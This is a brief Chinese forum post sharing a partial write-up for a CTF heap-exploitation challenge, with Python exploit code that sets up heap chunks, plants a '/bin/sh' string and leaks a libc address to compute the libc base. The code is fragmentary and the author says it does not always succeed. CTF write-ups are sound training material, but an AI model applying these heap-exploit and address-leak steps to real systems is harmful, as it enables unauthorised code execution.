-
-
[原创]绝地逃生 WP
-
发表于:
2019-6-26 12:25
5473
-
一血题。
没啥好说的,放WP,注意这个不能保证每次都能成功。
try:
add(0, 0xF8, 'A' * 1)
add(1, 0x68, 'B' * 1)
add(2, 0x68, 'C' * 1)
add(3, 0x68, '/bin/sh\x00' * 1)
for i in range(252):
add(i + 4, 0x10, 'A' * 1)
free(2, 254, 255)
except:
return
show(0)
leak_addr = p.recvuntil('\n1. ',drop = True)
leak_addr = u64(leak_addr.ljust(8, '\x00'))
print 'leak_addr ',hex(leak_addr)
libc.address = leak_addr - 96 - 0x10 - libc.symbols['__malloc_hook']
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2019-6-26 12:26
被xym编辑
,原因:
